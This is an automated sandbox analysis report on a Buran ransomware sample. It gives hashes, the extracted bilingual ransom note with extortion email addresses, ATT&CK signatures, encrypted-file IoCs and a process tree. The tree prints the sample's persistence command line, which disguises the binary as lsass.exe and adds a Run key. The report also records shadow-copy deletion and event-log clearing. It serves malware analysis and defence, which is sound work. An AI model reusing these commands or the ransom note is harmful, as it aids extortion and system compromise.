buran | 5c1141aa7d0b9fba71822607f3b1b086e2cc4529e63221a9a6ede74fa366512f

Analysis

max time kernel
151s
max time network
124s
platform
windows10_x64
resource
win10v20201028
submitted
02-02-2021 01:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

buran.exe
Size

222KB
MD5

3058d76e5fb2f2d2f65e232e98536182
SHA1

3e6e9abd6241526bf932885d118cbbe54e4e1cbe
SHA256

5c1141aa7d0b9fba71822607f3b1b086e2cc4529e63221a9a6ede74fa366512f
SHA512

b47bc559e183abe8d4be8e7b1f652f01bab0095bf37797d95a541d729dad82a8a1eb1a804bc7c009ab3d49b446498a2e6b487f680bb203df3e17c212f85dfd95

Score

10^/10

buran evasion persistence ransomware

Malware Config

Extracted

Path

C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Family

buran

Ransom Note

==== GERMAN ==== Alle Ihre Dateien, Dokumente, Fotos, Datenbanken und andere wichtige Dateien werden verschlusselt. Sie konnen es nicht selbst entschlusseln! Die einzige Methode Zum Wiederherstellen von Dateien muss ein eindeutiger privater Schlussel erworben werden. Nur wir konnen Ihnen diesen Schlussel geben und nur wir konnen Ihre Dateien wiederherstellen. Um sicher zu gehen, dass wir den Entschlusseler haben und er funktioniert, konnen Sie einen senden Senden Sie eine E-Mail an Wiederherstellung@cock.li oder Wiederherstellungsdatei@airmail.cc und entschlusseln Sie eine Datei kostenlos. Aber diese Datei sollte nicht wertvoll sein! Mochten Sie Ihre Dateien wirklich wiederherstellen? Schreiben Sie eine E-Mail an Wiederherstellung@cock.li Wiederherstellungsdatei@airmail.cc (reservieren) Ihre personliche ID: <! - ID -> Beachtung! * Benennen Sie verschlusselte Dateien nicht um. * Versuchen Sie nicht, Ihre Daten mit Software von Drittanbietern zu entschlusseln. Dies kann zu dauerhaftem Datenverlust fuhren. * Entschlusselung Ihrer Dateien mit Hilfe von Dritten moglich verursachen Sie erhohten Preis (sie addieren ihre Gebuhr zu unserem) oder Sie konnen Opfer eines Betrugs werden. ==== ENGLISH ==== All your files, documents, photos, databases and other important files are encrypted. You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. To be sure we have the decryptor and it works you can send an email Wiederherstellung@cock.li or Wiederherstellungsdatei@airmail.cc and decrypt one file for free. But this file should be of not valuable! Do you really want to restore your files? Write to email Wiederherstellung@cock.li Wiederherstellungsdatei@airmail.cc (reserve) Your personal ID: 17C729A0-DE24-D128-25CD-456E344875E9 Attention! * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

Emails

Wiederherstellung@cock.li

Wiederherstellungsdatei@airmail.cc

Signatures

Buran
Ransomware-as-a-service based on the VegaLocker family first identified in 2019.
ransomware buran
Clears Windows event logs 1 TTPs
evasion ransomware

Indicator Removal on Host
T1070
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Executes dropped EXE 3 IoCs

Processes:

lsass.exelsass.exelsass.exe

pid process

1636 lsass.exe
3836 lsass.exe
1380 lsass.exe

pid	process
1636	lsass.exe
3836	lsass.exe
1380	lsass.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\Local Security Authority Subsystem Service = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -start"	reg.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

lsass.exe

description	ioc	process
File opened (read-only)	\??\H:	lsass.exe
File opened (read-only)	\??\F:	lsass.exe
File opened (read-only)	\??\Y:	lsass.exe
File opened (read-only)	\??\T:	lsass.exe
File opened (read-only)	\??\K:	lsass.exe
File opened (read-only)	\??\Z:	lsass.exe
File opened (read-only)	\??\R:	lsass.exe
File opened (read-only)	\??\U:	lsass.exe
File opened (read-only)	\??\S:	lsass.exe
File opened (read-only)	\??\N:	lsass.exe
File opened (read-only)	\??\J:	lsass.exe
File opened (read-only)	\??\I:	lsass.exe
File opened (read-only)	\??\E:	lsass.exe
File opened (read-only)	\??\X:	lsass.exe
File opened (read-only)	\??\V:	lsass.exe
File opened (read-only)	\??\A:	lsass.exe
File opened (read-only)	\??\P:	lsass.exe
File opened (read-only)	\??\O:	lsass.exe
File opened (read-only)	\??\M:	lsass.exe
File opened (read-only)	\??\L:	lsass.exe
File opened (read-only)	\??\G:	lsass.exe
File opened (read-only)	\??\B:	lsass.exe
File opened (read-only)	\??\W:	lsass.exe
File opened (read-only)	\??\Q:	lsass.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

8 geoiptool.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
ransomware

System Information Discovery
T1082

flow	ioc
8	geoiptool.com

Drops file in Program Files directory 21789 IoCs

Processes:

lsass.exe

description	ioc	process
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\rarrow.gif.[17C729A0-DE24-D128-25CD-456E344875E9]	lsass.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	lsass.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Jumbo\jumbo_13d.png	lsass.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\LTR\contrast-black\SmallTile.scale-200.png	lsass.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-sl\ui-strings.js	lsass.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\MANIFEST.MF.[17C729A0-DE24-D128-25CD-456E344875E9]	lsass.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Home\contrast-black\MedTile.scale-125.png	lsass.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml	lsass.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\bv_60x42.png	lsass.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-32_altform-unplated_contrast-black.png	lsass.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\7834_32x32x32.png	lsass.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365BusinessR_SubTest-ul-oob.xrm-ms.[17C729A0-DE24-D128-25CD-456E344875E9]	lsass.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Fonts\private\DUBAI-BOLD.TTF	lsass.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\CubeTile_contrast-white.png	lsass.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_17.8010.5926.0_x64__8wekyb3d8bbwe\images\OfficeHubLogo_310x150.png	lsass.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\S_IlluCCFilesEmpty_180x180.svg	lsass.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Ion.thmx	lsass.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_SubTrial3-ul-oob.xrm-ms	lsass.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\GamePlayAssets\Localization\localized_DE-DE.respack	lsass.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteAppList.targetsize-32_altform-unplated.png	lsass.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1612.10312.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\InsiderHubWideTile.scale-100_contrast-white.png	lsass.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Pages_R_RHP.aapp.[17C729A0-DE24-D128-25CD-456E344875E9]	lsass.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_WorriedEye.png	lsass.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Assets\SkypeAppList.scale-200.png	lsass.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Home\contrast-black\LargeTile.scale-200.png	lsass.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\s_filetype_psd.svg	lsass.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\acrobat_parcel_generic_32.svg.[17C729A0-DE24-D128-25CD-456E344875E9]	lsass.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Buttons\Undo\Undo-press.mobile.png	lsass.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Icons\friends_activity.png	lsass.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\et_16x11.png	lsass.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\ExchangeWideTile.scale-200.png	lsass.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-64_contrast-black.png	lsass.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\feature.properties.[17C729A0-DE24-D128-25CD-456E344875E9]	lsass.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\feature.xml	lsass.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-javahelp.xml	lsass.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Excel2019VL_MAK_AE-ul-oob.xrm-ms.[17C729A0-DE24-D128-25CD-456E344875E9]	lsass.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\Resources\Fonts\StorMDL2.ttf	lsass.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\SearchEmail.png.[17C729A0-DE24-D128-25CD-456E344875E9]	lsass.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filter-dark-focus_32.svg.[17C729A0-DE24-D128-25CD-456E344875E9]	lsass.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\text_2x.png.[17C729A0-DE24-D128-25CD-456E344875E9]	lsass.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\themes\dark\files_icons.png.[17C729A0-DE24-D128-25CD-456E344875E9]	lsass.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.exe.config	lsass.exe
File created	C:\Program Files\Java\jdk1.8.0_66\db\bin\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	lsass.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\gimap.jar	lsass.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-80_altform-unplated_contrast-white.png	lsass.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\delete.svg.[17C729A0-DE24-D128-25CD-456E344875E9]	lsass.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\zh-cn\ui-strings.js	lsass.exe
File opened for modification	C:\Program Files\MeasureGroup.7z.[17C729A0-DE24-D128-25CD-456E344875E9]	lsass.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-150_8wekyb3d8bbwe\Assets\AppList.scale-150.png	lsass.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\fr-fr\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	lsass.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\bg_pattern_RHP.png	lsass.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PowerPointR_OEM_Perp-pl.xrm-ms.[17C729A0-DE24-D128-25CD-456E344875E9]	lsass.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\lipssealed.png	lsass.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.contrast-black_targetsize-30.png	lsass.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\access-bridge-64.jar.[17C729A0-DE24-D128-25CD-456E344875E9]	lsass.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar.[17C729A0-DE24-D128-25CD-456E344875E9]	lsass.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\ClientLangPack_eula.txt.[17C729A0-DE24-D128-25CD-456E344875E9]	lsass.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ECHO\ECHO.ELM.[17C729A0-DE24-D128-25CD-456E344875E9]	lsass.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\vlc.mo	lsass.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\zh-cn\ui-strings.js	lsass.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\MANIFEST.MF	lsass.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-lib-uihandler_ja.jar.[17C729A0-DE24-D128-25CD-456E344875E9]	lsass.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\release.[17C729A0-DE24-D128-25CD-456E344875E9]	lsass.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-72_altform-unplated.png	lsass.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

3820 vssadmin.exe

pid	process
3820	vssadmin.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

buran.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	buran.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	buran.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2100 PING.EXE

pid	process
2100	PING.EXE

Suspicious use of AdjustPrivilegeToken 52 IoCs

Processes:

lsass.exeWMIC.exevssvc.exewevtutil.exewevtutil.exewevtutil.exe

description	pid	process
Token: SeDebugPrivilege	1636	lsass.exe
Token: SeIncreaseQuotaPrivilege	188	WMIC.exe
Token: SeSecurityPrivilege	188	WMIC.exe
Token: SeTakeOwnershipPrivilege	188	WMIC.exe
Token: SeLoadDriverPrivilege	188	WMIC.exe
Token: SeSystemProfilePrivilege	188	WMIC.exe
Token: SeSystemtimePrivilege	188	WMIC.exe
Token: SeProfSingleProcessPrivilege	188	WMIC.exe
Token: SeIncBasePriorityPrivilege	188	WMIC.exe
Token: SeCreatePagefilePrivilege	188	WMIC.exe
Token: SeBackupPrivilege	188	WMIC.exe
Token: SeRestorePrivilege	188	WMIC.exe
Token: SeShutdownPrivilege	188	WMIC.exe
Token: SeDebugPrivilege	188	WMIC.exe
Token: SeSystemEnvironmentPrivilege	188	WMIC.exe
Token: SeRemoteShutdownPrivilege	188	WMIC.exe
Token: SeUndockPrivilege	188	WMIC.exe
Token: SeManageVolumePrivilege	188	WMIC.exe
Token: 33	188	WMIC.exe
Token: 34	188	WMIC.exe
Token: 35	188	WMIC.exe
Token: 36	188	WMIC.exe
Token: SeIncreaseQuotaPrivilege	188	WMIC.exe
Token: SeSecurityPrivilege	188	WMIC.exe
Token: SeTakeOwnershipPrivilege	188	WMIC.exe
Token: SeLoadDriverPrivilege	188	WMIC.exe
Token: SeSystemProfilePrivilege	188	WMIC.exe
Token: SeSystemtimePrivilege	188	WMIC.exe
Token: SeProfSingleProcessPrivilege	188	WMIC.exe
Token: SeIncBasePriorityPrivilege	188	WMIC.exe
Token: SeCreatePagefilePrivilege	188	WMIC.exe
Token: SeBackupPrivilege	188	WMIC.exe
Token: SeRestorePrivilege	188	WMIC.exe
Token: SeShutdownPrivilege	188	WMIC.exe
Token: SeDebugPrivilege	188	WMIC.exe
Token: SeSystemEnvironmentPrivilege	188	WMIC.exe
Token: SeRemoteShutdownPrivilege	188	WMIC.exe
Token: SeUndockPrivilege	188	WMIC.exe
Token: SeManageVolumePrivilege	188	WMIC.exe
Token: 33	188	WMIC.exe
Token: 34	188	WMIC.exe
Token: 35	188	WMIC.exe
Token: 36	188	WMIC.exe
Token: SeBackupPrivilege	4088	vssvc.exe
Token: SeRestorePrivilege	4088	vssvc.exe
Token: SeAuditPrivilege	4088	vssvc.exe
Token: SeSecurityPrivilege	2120	wevtutil.exe
Token: SeBackupPrivilege	2120	wevtutil.exe
Token: SeSecurityPrivilege	2748	wevtutil.exe
Token: SeBackupPrivilege	2748	wevtutil.exe
Token: SeSecurityPrivilege	1400	wevtutil.exe
Token: SeBackupPrivilege	1400	wevtutil.exe

Suspicious use of WriteProcessMemory 102 IoCs

Processes:

buran.execmd.execmd.exelsass.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1052 wrote to memory of 208	1052	buran.exe	cmd.exe
PID 1052 wrote to memory of 208	1052	buran.exe	cmd.exe
PID 1052 wrote to memory of 208	1052	buran.exe	cmd.exe
PID 208 wrote to memory of 2540	208	cmd.exe	reg.exe
PID 208 wrote to memory of 2540	208	cmd.exe	reg.exe
PID 208 wrote to memory of 2540	208	cmd.exe	reg.exe
PID 1052 wrote to memory of 1636	1052	buran.exe	lsass.exe
PID 1052 wrote to memory of 1636	1052	buran.exe	lsass.exe
PID 1052 wrote to memory of 1636	1052	buran.exe	lsass.exe
PID 1052 wrote to memory of 1056	1052	buran.exe	cmd.exe
PID 1052 wrote to memory of 1056	1052	buran.exe	cmd.exe
PID 1052 wrote to memory of 1056	1052	buran.exe	cmd.exe
PID 1056 wrote to memory of 2100	1056	cmd.exe	PING.EXE
PID 1056 wrote to memory of 2100	1056	cmd.exe	PING.EXE
PID 1056 wrote to memory of 2100	1056	cmd.exe	PING.EXE
PID 1636 wrote to memory of 2356	1636	lsass.exe	cmd.exe
PID 1636 wrote to memory of 2356	1636	lsass.exe	cmd.exe
PID 1636 wrote to memory of 2356	1636	lsass.exe	cmd.exe
PID 1636 wrote to memory of 3184	1636	lsass.exe	cmd.exe
PID 1636 wrote to memory of 3184	1636	lsass.exe	cmd.exe
PID 1636 wrote to memory of 3184	1636	lsass.exe	cmd.exe
PID 1636 wrote to memory of 3012	1636	lsass.exe	cmd.exe
PID 1636 wrote to memory of 3012	1636	lsass.exe	cmd.exe
PID 1636 wrote to memory of 3012	1636	lsass.exe	cmd.exe
PID 1636 wrote to memory of 3588	1636	lsass.exe	cmd.exe
PID 1636 wrote to memory of 3588	1636	lsass.exe	cmd.exe
PID 1636 wrote to memory of 3588	1636	lsass.exe	cmd.exe
PID 1636 wrote to memory of 3204	1636	lsass.exe	cmd.exe
PID 1636 wrote to memory of 3204	1636	lsass.exe	cmd.exe
PID 1636 wrote to memory of 3204	1636	lsass.exe	cmd.exe
PID 1636 wrote to memory of 1160	1636	lsass.exe	cmd.exe
PID 1636 wrote to memory of 1160	1636	lsass.exe	cmd.exe
PID 1636 wrote to memory of 1160	1636	lsass.exe	cmd.exe
PID 1636 wrote to memory of 2504	1636	lsass.exe	cmd.exe
PID 1636 wrote to memory of 2504	1636	lsass.exe	cmd.exe
PID 1636 wrote to memory of 2504	1636	lsass.exe	cmd.exe
PID 2504 wrote to memory of 188	2504	cmd.exe	WMIC.exe
PID 2504 wrote to memory of 188	2504	cmd.exe	WMIC.exe
PID 2504 wrote to memory of 188	2504	cmd.exe	WMIC.exe
PID 1636 wrote to memory of 2208	1636	lsass.exe	cmd.exe
PID 1636 wrote to memory of 2208	1636	lsass.exe	cmd.exe
PID 1636 wrote to memory of 2208	1636	lsass.exe	cmd.exe
PID 2208 wrote to memory of 3820	2208	cmd.exe	vssadmin.exe
PID 2208 wrote to memory of 3820	2208	cmd.exe	vssadmin.exe
PID 2208 wrote to memory of 3820	2208	cmd.exe	vssadmin.exe
PID 1636 wrote to memory of 3052	1636	lsass.exe	cmd.exe
PID 1636 wrote to memory of 3052	1636	lsass.exe	cmd.exe
PID 1636 wrote to memory of 3052	1636	lsass.exe	cmd.exe
PID 3052 wrote to memory of 3576	3052	cmd.exe	reg.exe
PID 3052 wrote to memory of 3576	3052	cmd.exe	reg.exe
PID 3052 wrote to memory of 3576	3052	cmd.exe	reg.exe
PID 1636 wrote to memory of 496	1636	lsass.exe	cmd.exe
PID 1636 wrote to memory of 496	1636	lsass.exe	cmd.exe
PID 1636 wrote to memory of 496	1636	lsass.exe	cmd.exe
PID 496 wrote to memory of 2392	496	cmd.exe	reg.exe
PID 496 wrote to memory of 2392	496	cmd.exe	reg.exe
PID 496 wrote to memory of 2392	496	cmd.exe	reg.exe
PID 1636 wrote to memory of 2588	1636	lsass.exe	cmd.exe
PID 1636 wrote to memory of 2588	1636	lsass.exe	cmd.exe
PID 1636 wrote to memory of 2588	1636	lsass.exe	cmd.exe
PID 2588 wrote to memory of 2452	2588	cmd.exe	reg.exe
PID 2588 wrote to memory of 2452	2588	cmd.exe	reg.exe
PID 2588 wrote to memory of 2452	2588	cmd.exe	reg.exe
PID 1636 wrote to memory of 1276	1636	lsass.exe	cmd.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

2128 attrib.exe

pid	process
2128	attrib.exe

C:\Users\Admin\AppData\Local\Temp\buran.exe
"C:\Users\Admin\AppData\Local\Temp\buran.exe"
1⤵
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1052

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /e:on /c md "C:\Users\Admin\AppData\Roaming\Microsoft\Windows" & copy "C:\Users\Admin\AppData\Local\Temp\buran.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe" & reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /V "Local Security Authority Subsystem Service" /t REG_SZ /F /D "\"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe\" -start"
2⤵
- Suspicious use of WriteProcessMemory
PID:208

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /V "Local Security Authority Subsystem Service" /t REG_SZ /F /D "\"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe\" -start"
3⤵
- Adds Run key to start application
PID:2540

